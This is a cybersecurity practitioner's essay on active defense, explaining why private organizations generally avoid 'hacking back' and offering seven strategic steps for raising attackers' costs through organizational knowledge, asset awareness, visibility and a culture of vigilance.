Many years ago, I spoke at a @suitsandspooks panel in Washington, D.C. with some of the cybersecurity industry’s best and brightest minds. One of the topics addressed was the concept of active defense strategy in the commercial (private sector) world versus the public world. In those days the idea of ‘hacking back’ against a hostile, adversarial threat actor or group was discussed frequently, with some organizations and their leaders taking a more vocal stance (in both public and private sectors).
The panel was fantastic: Dmitri Alperovitch (CrowdStrike), Greg Hoglund, Jeff Carr, me, and moderated by Anup Ghosh. A smart group of guys all with strong opinions on the subject matter. The idea and execution of active defense measures and ‘hacking back’ varied – much like the assessments of the panelists themselves. I recall with fondness the panel of thinkers; not solely due to the fact that we were all younger and earlier on in our careers, but because of the passion with which each participant conveyed their opinions. I often think back on that panel, comparing those views to where our industry – and our world – are today.
In many respects, things have become more convoluted and challenging for the defender while in some regards easier for the adversary. Plus, the world has become increasingly dangerous as the convergence of cyber-space and our daily lives (personal, professional etc.,) has continued, thus introducing net new ways for adversarial threat actors great and small to increase the scope of their operations and advance their goals—all in alignment with their operational agendas and cyber warfare doctrines.
A New World
Ample examples of this were seen throughout the last three years during the global pandemic. Ransomware victim targeting and attacks against medical and biopharmaceutical organizations increased at an unprecedented rate, while the threat of third-party compromise and supply chain infiltration (compromise, exploitation) became a reality; a clear and present danger affecting organizations the world over. The reality of our individual and collective vulnerability was driven home and accentuated during a time of global duress in ways many would have previously considered to have been out of bounds in times past, as the predatory behavior of adversarial threat actors and groups increased dramatically.
Furthermore, the domains associated with conventional warfare and cyber became real in the hearts and minds of many the world over as the conflict and war between Russia and Ukraine began, and reports of distributed denial of service and other forms of cyber attacks began being reported through trade and traditional media on a regular basis; surprising to some and to others less so, as the fifth domain of warfare (cyber) has been discussed at length for decades.
The Defender’s Plight
During the @suitsandspooks panel, the concepts of active defense and ‘hacking back’ were expounded upon, discussed, debated, and in some cases, cautioned against. In those days (and I believe this is still true today), it was neither practical nor pragmatic for private sector organizations or entities (assuming they did not have the backing of the federal government) to actively target, attack, and ‘hack back’ adversaries targeting or successfully exploiting and targeting them.
There are many exceptionally good reasons for this stance: everything from the inability to be sure that the infrastructure and assets used by the adversary are theirs (not someone’s grandmother’s PC) or an unsuspecting organization’s infrastructure, to those involving national/international law and warfare doctrine.
There is still a great need to deter—in the most active sense possible—the advancements and agendas of adversarial threat actors and groups once they are detected and identified.
You may be asking yourself how this can be achieved without taking the most direct approach possible in a tit for tat fashion.
The answer lies in the introduction of costs to an adversarial threat actor as a form of determent.
This is the Way
Considerations before your organization brings the fight to the adversary through increased costs
I have a friend, Andrew Thompson (@ImposeCost), who talks a lot about these imposed costs. That the best deterrence to adversarial threat groups and actors is to make their attempts, their operations, and their campaigns as costly to carry out as possible—in order to make them really consider what they are doing, who they are targeting, and why they are doing so.
To begin with, it takes more than just the application of the latest and greatest technology, which should come as no surprise to most of you (although at times this can make all the difference in the world). Here’s my list:
7 keys to introduce and increase costs with prejudice for adversarial threat actors:
- Know and understand your organization. What does your organization do? What does it produce (in the form of products or services)? What makes it unique? Knowing your organization’s business (or mission depending on the type of organization that you are a part of) will aid you in finding the best ways to introduce and increase costs with prejudice tactically and strategically for those adversaries targeting the organization.
- Know and understand your assets. What does your organization own in terms of assets? This should include more than those which communicate with and are reachable via the Internet. Understanding your organization’s asset profile will aid you in understanding where and how to prioritize your efforts related to the introduction of cost and the intensity you will employ against adversaries. Remember, assets can and should include personnel – humans are often targeted, exploited, and compromised – so it is important to bear that in mind during the formulation of your organizational strategy related to engaging and deterring adversaries. Developing a deep understanding of your organization’s assets and their vulnerability to exploitation is crucial in developing a solid strategy to introduce and increase the costs of an adversarial threat actor group.
- Learn and understand what makes your organization a target. What is it about your organization (see #1) that makes it special or attractive to adversarial threat actors? Is it something you own, produce, promote, or fulfill? Is it intellectual capital contained within key human assets? Learn and understand what makes your organization a target. Discover what makes you attractive and in the course of collaborating with those parties chartered to manage the overarching risk of the organization, aid in the development of tactics and strategies that are tailored to address your organizational target profile.
- Know whether your organization is a target of opportunity or intent.
- Do you know what type of target you are in the eyes of an adversarial threat actor group?
- What vertical or sector are you a part of?
- What does your organization do?
- Are you a target of opportunity such as those seen in waterholing attacks?
- Could your organization inadvertently aid an adversarial threat actor in advancing their agendas and goals toward primary targets of interest?
- Is your organization – by virtue of what you know about it, its business, what makes it unique, and what it produces – a target of interest or a likely target of interest of adversarial threat actor groups?
Learning as much as you can and developing a deep understanding of your organization and its peers in your industry vertical guides you in developing a strategy that raises the costs and stakes of adversarial threat actors targeting your organization.
- Learn to live off the land like your adversaries do. Are you aware of the native tools, applications, and utilities found within infrastructure and operating systems throughout the world, which enable your sys admins and devops personnel and adversaries to advance toward their goals – short and long term, which may go unnoticed when used locally on a host or across the network?
Many such tools, applications, and utilities enable adversaries to move with impunity due to their pedestrian nature and presence within networks. However, not recognizing, detecting, and responding to their use can mean the difference between stopping an adversarial motion early in its tracks and a breach with full exfiltration over time. As a result, learning to live off the land like your adversaries is paramount in structuring technical control-driven plans and strategic approaches designed to introduce and increase costs of adversarial threat actor groups.
- Total visibility within your organization via thorough instrumentation. Do you have the availability to zero in on any event, anywhere throughout your organization, in order to start preliminary investigations and beyond? Do you have total coverage of all aspects of your organization’s infrastructure? Can you delve into its endpoints (laptops, desktops, servers, mobile devices, etc.) and conduct investigations while ensuring persistence on those devices anywhere in the world? Are your off-premises (cloud) workloads properly instrumented, managed, and monitored? Achieving this degree of visibility takes time, careful planning, vision, and commitment. There are several ways to achieve this through the use of heterogenous technology offerings or homogeneous suites. The importance of achieving this degree of visibility – and insights gained – with respect to triaging alerts, events, and incidents cannot be stressed enough.
- Strive toward quality and a culture that respects and demands vigilance. Does your organization take advanced threats and adversarial threat groups seriously enough? Do your leadership and stakeholders understand the importance of understanding points 1-6? If not, think how you and your peers, subordinates, and employees can encourage the importance of these points and the criticality of introducing an increasing cost to adversarial threat actor groups targeting your organization. Compelling yourself, your colleagues, leadership, and stakeholders is critical in mitigating the threats posed by such actors and risks that are presented to your organization.
At this point you may be asking where my organization would begin with respect to the seven points above. If you are asking this question, rest assured that you and your organization are neither unique nor alone. My recommendation to any organization in this position would first be that it knows itself in aggregate. Every stakeholder with any modicum of responsibility or charter for defending and securing the organization should be fluent to the degree that they need to know those areas outlined in point 1 above: know thy organization! This will help you take the first, and perhaps most difficult step, in the process:
Recognize and accept that it’s highly probable (depending upon the type of business) your organization is—or soon will be—a target by motivated, often very well-funded, adversarial threat actors.
This first step is critical in setting in motion an active defense strategy that sees the totality of the organization’s resources used – in concert, to foster the hardest target for any adversary that may seek it out. This will require unanimity among stakeholders from across the organization’s executive leadership down to the rank and file. A uniform approach that promotes a culture of vigilance and attention to detail can and often does make the difference in whether or not an organization remains a hard target that can defend and vigorously mitigate attacks – or finds itself a victim.
So, the first step in introducing increasing costs to present or potential adversarial threat actors is to gain a crisp understanding of the organization and its business. Achieving consensus among stakeholders to reorient the organization’s culture toward an active defensive strategy against threats and adversarial threat actors is not a simple proposition. It will require good strategy, diplomacy, and a deep understanding of the organization’s approach to risk management and posture. Communication of facts in a non-hyperbolic fashion will aid you and your organization in moving toward that goal.
Many technology investments beyond those related to cybersecurity can and do provide a wealth of information and data to savvy organizations regarding the state and posture of the organization, patterns of use of both systems, assets, and users associated and attached to the organizations network infrastructure, on and off-premises. From route/switch (and associated technologies) to server, storage, cloud, endpoint, and beyond – almost all forms of my ‘enterprise’ technology affords some form of native logging and/or cybersecurity feature/functionality.
It is imperative that organizations fully leverage those native aspects of their non-cybersecurity technology investments as a compliment to their cyber-specific technology investments. For example, if your organization is a Microsoft O365 customer at either the E3 or E5 tiers licensing levels, you can enjoy a variety of vital forms cybersecurity technology and log sources crucial in increasing the costs associated with adversarial attacks, operations, and campaigns.
More so than ever before, it is critical that we introduce and impose more costs on any and all adversaries that threaten our way of life and ability to conduct our business. The world has changed dramatically since I sat and took part on that panel so many years ago. However, the importance of that debate (and those that were spawned from it) cannot be underscored enough. If we hope to regain and keep the competitive edge against global adversarial threat actor groups, we must give these bad actors pause to continue their attacks, operations, and campaigns. We must take it upon ourselves to introduce as much cost to them and raise the stakes to the best of our resources knowing that in doing so we, will can deter and stop them. A failure to do so is an invitation for bad actors to continue with impunity. The world and our way of life cannot afford this ad infinitum.
Author Will Gragido
Will began his tech journey in the early ‘90s when he left college and joined the United States Marine Corps. Will moved quickly (as Marines do) into the emerging world of data communications, so he knows a few things about internetworking, information security, communications intelligence, and information warfare. Throughout his career, Will has been a leader for many of Cybersecurity’s outstanding services, products, and threat research intel organizations, including International Network Services, Internet Security Systems (ISS), Damballa, Cassandra Security, TippingPoint DV Labs, RSA NetWitness FirstWatch, Digital Shadows, Hyas, and Prevailion. A three-time published author, Will’s written on cybercrime, espionage, and threat forecasting (with a fourth book in the works). He’s also a keynote-level speaker at tier-one conferences globally, and sat on the CFP selection board for threat research and malware for the RSAC USA conference. Will currently lives in the greater Austin, TX area with his wife, their two youngest children, and Chuy (the dog).